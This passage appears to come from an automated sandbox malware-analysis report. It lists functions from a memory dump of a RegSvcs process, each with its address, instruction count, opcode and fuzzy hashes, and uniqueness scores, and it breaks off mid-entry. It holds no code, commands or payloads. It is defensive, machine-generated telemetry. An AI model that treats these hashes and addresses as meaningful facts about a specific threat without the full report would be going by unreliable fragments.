Opcode Fuzzy Hash: e46d70538c1413ed22b7798cdb1c30b8f3f2d7fe7880f2f92d1fe1afa0a782ad
Instruction Fuzzy Hash: 4901F1311412119BCF37EF19CC04937BBAEFF51650B04442EE9014B3A0CB26DC81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 015EC020 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction ID: 5cdd73c35b458a5579ed8214bc70ed3157459f1ae256b7b7cc7e0f49403d49f2
Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
Instruction Fuzzy Hash: CA01D832500705DFEB36D6A9CD04EAB7BEAFFE5614F04881DE5968B640DE70E402CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016320F0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0ddf6d0f4e4db8482689e3fa12ca80774b07f520a371d68cf886629913a050
Instruction ID: 84af0ca63fff399bf348eb82bab50b0ede62575fc7d8618821d19c2233166544
Opcode Fuzzy Hash: 3a0ddf6d0f4e4db8482689e3fa12ca80774b07f520a371d68cf886629913a050
Instruction Fuzzy Hash: 0F116D35A0020DEFCB05DFA4CD51BAEBBBAEB84244F00405DEA019B390DA35EE11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0162E5CF Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b98e1f0af6fe969535d23b2899b7c33f0b6c3f0c13eb7ce7e13e1b9937a00600
Instruction ID: 7e9f812a4edeccdf771c89fe74f7a04dde4d181a5d66511c20fe0b4f15d02d59
Opcode Fuzzy Hash: b98e1f0af6fe969535d23b2899b7c33f0b6c3f0c13eb7ce7e13e1b9937a00600
Instruction Fuzzy Hash: 2801F2B1201A02BFC316AB39CD84E13BBADFF947A4B01062DB50983690DB35EC51C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 016869C0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa088a71907b67c5545c6eeb7005a7dbfabf65f499a3dc4b9466a55aa88674d
Instruction ID: 6c93de3b537699da9270d507a698ef197c6b0f318a0828ce5d33b20ed4fa0aff
Opcode Fuzzy Hash: afa088a71907b67c5545c6eeb7005a7dbfabf65f499a3dc4b9466a55aa88674d
Instruction Fuzzy Hash: CA01D832214212DBC324EF6ADC48967FBA8EB98660F114229ED59873C0E7309911C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0167C460 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15302e1c02edb3a31472c69410571ff31a851df46208c93d96ee8785e02ddf3a
Instruction ID: f6bc577ff7da0bfe26c9c73d9ab2ac1e3a2dc583e1287aa138e4799b5e1eb3ad
Opcode Fuzzy Hash: 15302e1c02edb3a31472c69410571ff31a851df46208c93d96ee8785e02ddf3a
Instruction Fuzzy Hash: 61115B71A0120AEBDB15EF68CC40EAEBBB6EB98240F104059F90197384DA34E911CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0167C97C Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a894db07b27d54ccd62f3e3e8a41549f496324178bad26104e596a355c7d950
Instruction ID: 11b2f95e5b9e04172ef48b59dd275aa686df2476362f4da19168600ecc858fd9
Opcode Fuzzy Hash: 8a894db07b27d54ccd62f3e3e8a41549f496324178bad26104e596a355c7d950
Instruction Fuzzy Hash: 8E115BB26183099FC700DF69D942A5BBBE4FF98710F00451EF998D7391E634E901CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0167CA11 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2609f522162b654e793c2b7c07048b070352ae1715667f10dba20803b4b229b
Instruction ID: 020cc7ec644798a32ab0d37873ddd08dacc80e9819b11ae4a2e33840776dcf01
Opcode Fuzzy Hash: a2609f522162b654e793c2b7c07048b070352ae1715667f10dba20803b4b229b
Instruction Fuzzy Hash: A2118BB16083099FC300DF69C841A4BBBE4FF99350F00851EF998D73A4E630E900CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0160E016 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction ID: 9bd32fd7b9873732b419a3f808095478a6dde45f5ec93e8c53fd223519eaae23
Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
Instruction Fuzzy Hash: AA015AB22405809FE32BD61DCD48F277BD8EB59754F0908A6FA06CB7E1D729DC41C625

Uniqueness

Uniqueness Score: -1.00%

Function 015E826B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733e2c5140a95c997fb35d9ea4daa9ce7fa40628cae49b4c916139ff46e47cf7
Instruction ID: 66c6a8d75dcebf8e576db3fdbb495295d2498f5e7f0f7494036dd45c5b286e75
Opcode Fuzzy Hash: 733e2c5140a95c997fb35d9ea4daa9ce7fa40628cae49b4c916139ff46e47cf7
Instruction Fuzzy Hash: 9901A231B10505DFD718EBA9DC189AFB7EAFF81620B19416A9901AF780EE20DD01C790

Uniqueness

Uniqueness Score: -1.00%

Function 0169EB50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4eab4c542f0b8ff2657f4c1d764f8bc5b8dd054bab6fa5e3c5aef2b0a3b3f2b3
Instruction ID: f55aa7c554339f74196e050812c763ca5914d6283544d7b82a705daf1dbda698
Opcode Fuzzy Hash: 4eab4c542f0b8ff2657f4c1d764f8bc5b8dd054bab6fa5e3c5aef2b0a3b3f2b3
Instruction Fuzzy Hash: FE01DF71281601AFDB329F19DD04B13BBE9AF54B50F01442EE2068F390C7B2D8808B98

Uniqueness

Uniqueness Score: -1.00%

Function 015F2582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9be0a3abbf8c8422a032807cd00b3ee9be6faf5295eec53576f67fab71549046
Instruction ID: 5e6fbdb54ef454a648e321b32b991d141bd4887c1caa6684ac487efaf56136cc
Opcode Fuzzy Hash: 9be0a3abbf8c8422a032807cd00b3ee9be6faf5295eec53576f67fab71549046
Instruction Fuzzy Hash: 90F0F972641B11B7C7329B5A8C44F07BAAAFB84B90F10402CA7069B640C630DD01CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0161C073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: 3e982f3153d4df6be61d51d44d01e693dc9a5f1f2367a02c96cc8fb4bf1e8100
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: D7F0C2B2600A15ABD324CF4DDC40E57FBEADBD1B80F08816CA545C7320EA31DD04CB94

Uniqueness

Uniqueness Score: -1.00%

Function 016C634F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce2bed58bdc8e50c24b295610e7fb6b0185d8f3a27a9ba9ae3a8c8e72f7c4c0f
Instruction ID: 231940820545417894ddda0aca1a16919aaef4898c131d845ed1b68a578323ba
Opcode Fuzzy Hash: ce2bed58bdc8e50c24b295610e7fb6b0185d8f3a27a9ba9ae3a8c8e72f7c4c0f
Instruction Fuzzy Hash: ED012171A10209EFDB04DFA9D951AAEB7F8FF58704F10405AE904E7391D7749A018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 015EC310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: 5c3a2c1ace81ecc1a12bbf613be05198a8e0b031e7ff273a128af25fbc38ef76
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: 26F04C33A04A239BD73A16594848B2FA5D5BFD9A64F190035E219DF200C960CD0192D0

Uniqueness

Uniqueness Score: -1.00%

Function 016C625D Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a701879734794943d1a748961b87bc57fcccb7ffe6323b75596f696e116e716e
Instruction ID: cd6bbd8a2f9ea9d846cc48be546ebb9ae0e44896bfef4d880c013c548c8f3d9a
Opcode Fuzzy Hash: a701879734794943d1a748961b87bc57fcccb7ffe6323b75596f696e116e716e
Instruction Fuzzy Hash: 90017171A0020AEFCB04DFA9D941AAEB7F9EF58700F10801AF900E7391D6789901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 016C62D6 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb75f6582de4b197120240f0596932fb44063a675bbdea35b24797de7006b94
Instruction ID: 3dc593188af7a7ed4fb43588fe53d70619d1ab022d87f83af1ec7f781ca4bb2a
Opcode Fuzzy Hash: efb75f6582de4b197120240f0596932fb44063a675bbdea35b24797de7006b94
Instruction Fuzzy Hash: 71012171A00209EFDB04DFA9D945AAEB7F8EF58704F50405AE914E7391D6749D018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0162CA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: d260d65b905172c19f460f83b0f73e62699bfcb0b889260a5b31f746bbc1a782
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 0501D132201A859BE722972DCD05F5ABB9DEF51750F0880A9FE048B7A1D779C801C625

Uniqueness

Uniqueness Score: -1.00%

Function 016C61E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be61cf1e07eabb487ecd2fcfc574efe70a088776f8d040ab34e7b8207b4e1a0
Instruction ID: a8a9b1aadf7b4f1545fa81e427729548ef990c69f4124d9e714dcd1f50e6374e
Opcode Fuzzy Hash: 4be61cf1e07eabb487ecd2fcfc574efe70a088776f8d040ab34e7b8207b4e1a0
Instruction Fuzzy Hash: 8E012C71A002599BDB04DFA9D945AAEBBF9EF58710F14406EE501AB380D778EA01CB98

Uniqueness

Uniqueness Score: -1.00%

Function 016763C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: b70a651256790e559a534e00af1cdba2f5c428f3770a8b22f6de298f7ed528ba
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: 84F01D7220001EBFEF029F94DD80DAF7B7EFB59298B104169FA11A2160D631DD21ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 0167A4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d75e7d54bf65736613ebb3d7d1d06189c7a5ee00b71526ea7adc912e5c1a330
Instruction ID: e795f8acab258ec24ab158b1a95cd141dc680a94fd3057579acc43d04ec9f407
Opcode Fuzzy Hash: 8d75e7d54bf65736613ebb3d7d1d06189c7a5ee00b71526ea7adc912e5c1a330
Instruction Fuzzy Hash: 1C018536100209ABDF129F84DC40EDE3FA6FB4C764F0A8205FE196A260C732D971EB81

Uniqueness

Uniqueness Score: -1.00%

Function 015EC0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05d364e3a17fca20b28a2afbfbc6d4c37800e341fdd09c01d9bb90337ca1fa1
Instruction ID: 41d381947ac9348963c6cbfaad4c72ea4fc34faa468e5782882e73ae205792c5
Opcode Fuzzy Hash: a05d364e3a17fca20b28a2afbfbc6d4c37800e341fdd09c01d9bb90337ca1fa1
Instruction Fuzzy Hash: 3EF02471A143425FF32C9A5D8C05B3232D6F7D4A50F25846EEB098F6C1E971DC018794

Uniqueness

Uniqueness Score: -1.00%

Function 0162656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8564058afa7ec453928f2dab7b91fce7e25ad95e63e4f41ee4a9bf28be2d72
Instruction ID: bb24d5351ec47a776aed169eed7f4bdb1df4487270fed81e31bc920ae6e4374f
Opcode Fuzzy Hash: 8c8564058afa7ec453928f2dab7b91fce7e25ad95e63e4f41ee4a9bf28be2d72
Instruction Fuzzy Hash: F6018171201A859FF327972CCD48B2537A9AB50B44F584194FA01AB7E6DB28D8428614

Uniqueness

Uniqueness Score: -1.00%

Function 0169437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: 52abc4a3508a8eebd47055e48220d8288410de15308717d17b7ad62076c7a9aa
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 2AF08935341D2347EF76AA3F9D10B2AAA5E9F90A51B05452D9956CB780DF60DC028B90

Uniqueness

Uniqueness Score: -1.00%

Function 0167E872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: cff438871f39857565bbb9fc5c392baa4b8247b27ed31ff4218839d50e84b6a9
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 4EF054327515119FD3219A4DCC80F16B769AFD5A60F1A01A9A6049B3A0C761EC0687D0

Uniqueness

Uniqueness Score: -1.00%

Function 0167C89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b030153d31f7192a39689625da8e8184918eeaf2794a4c86bd4ad2238397442
Instruction ID: 9e08def899168f8177cc578dc50b9d9c5ca94e675efa44df7b1812e5f9e9f780
Opcode Fuzzy Hash: 5b030153d31f7192a39689625da8e8184918eeaf2794a4c86bd4ad2238397442
Instruction Fuzzy Hash: E7F08C716053459FC314EF28C942A1BBBE4EF98610F40465EB898DB390EA34E901C796

Uniqueness

Uniqueness Score: -1.00%

Function 01620854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: f626b290dbbedb979fa8f356ebb970f98bf6680209127a59dd77a933cd56e706
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: 8AF0B472610605AFE714DB25CC05F57B6E9EF98340F258078E945D72A0FAB4DD01CA55

Uniqueness

Uniqueness Score: -1.00%

Function 0167C912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9da96cb7465b5321a4d9785c6c02ad9aebb1c51748d5602d6ab8c08f4f28f84
Instruction ID: 3067ac426628a36eaa2025686e3aec9ff66e9b4d952c9f622c32a2a18a07bff1
Opcode Fuzzy Hash: b9da96cb7465b5321a4d9785c6c02ad9aebb1c51748d5602d6ab8c08f4f28f84
Instruction Fuzzy Hash: 1EF06270A0124AEFCB04EF69D915A5EB7F5FF58300F008059B955EB3C5DA78EA01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 015F47FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ada22edbf95d51b2444463b9f17fffa4a52e31e55949e2816819e946258a793
Instruction ID: fea497284dba823ad3fa1a6e24b26abfd104a3f8d7aa990e29e1700f2dbee06c
Opcode Fuzzy Hash: 8ada22edbf95d51b2444463b9f17fffa4a52e31e55949e2816819e946258a793
Instruction Fuzzy Hash: 8EF02E319426E08FE732CB6CC854B7BBBD4BB00A30F08886EC7898F102C728D880C640

Uniqueness

Uniqueness Score: -1.00%

Function 016B0115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec8e5744099f9c07161e24e89854f7974c51af03bd063adfedb0d0444278496
Instruction ID: 3bc27f7758d1b1d6801d5272ff78512450124a86ecef898d3cb8c0778ef7d75f
Opcode Fuzzy Hash: eec8e5744099f9c07161e24e89854f7974c51af03bd063adfedb0d0444278496
Instruction Fuzzy Hash: C4F027664266810ACB366B6CECD02D72FB6A761024F492189D4A15B306C67888D3CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0162C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3244003cff011ae40cc24d86bccc71220fef3336f0543a9f0a7f62fcaec5b171
Instruction ID: 43abd5a8c39439f132099b95d5b1af78aa06f6c840924911020a67cf59d079bb
Opcode Fuzzy Hash: 3244003cff011ae40cc24d86bccc71220fef3336f0543a9f0a7f62fcaec5b171
Instruction Fuzzy Hash: 3DF05271401E718FE332DB1CCC48BA97BD4AB00BA0F089429C40287702C3A4E880CE60

Uniqueness

Uniqueness Score: -1.00%

Function 01632619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 1fd2e1a44710c1e86cbddc4cd6acdc52ffc35b66923fea30649bdf7f546ccaa8
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: 14E0D8323006012BE7129E598CD4F47776FDFD3B10F04007DB5045F292CAE2DC0986A8

Uniqueness

Uniqueness Score: -1.00%

Function 01686030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 8fa2d125852fffa7c2113375187e9c4c1239c368195137f6ef1ba436f5507eb1
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: ADF06572104204DFE3219F09DE44F52B7F9EB15364F45C129E6099B661D37AEC41CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 015F0710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 4889d6251a7c7093f37f202e8dcd810fa67a2f1b415b50598283b28f906435b7
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 94F0E53A205341DFDB16DF19C440A957BE6FB51350B040499F9428B382D735ED81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 016249D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: b20f119d239fa40380faac53079f4bb665cdd9224b1f510be05be63d600eaf19
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 72E0D832248955ABD3211A598C00B6A77A6DBD07A0F150429EA418B258DFB0DC41CFDC

Uniqueness

Uniqueness Score: -1.00%

Function 016C4164 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1705460907.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_15c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4176755b0a56c2bf9f3c0051c76f1b9356625fcf1cd0623e00c777691b5155d6
Instruction ID: 46a00c891082e21555a03926c97103c6d7e9b1abffa485e123418d331d4621bb
Opcode Fuzzy Hash: 4176755b0a56c2bf9f3c0051c76f1b9356625fcf1cd0623e00c777691b5155d6
Instruction Fuzzy Hash: 18F0E531A259918FE772D72CD9A0B7277E0EFA0E31F0A055CD4808BE12CB24DC40C650

Uniqueness

Uniqueness Score: -1.00%

Function 0169678E Relevance: .0, Instructions: 27COMMON

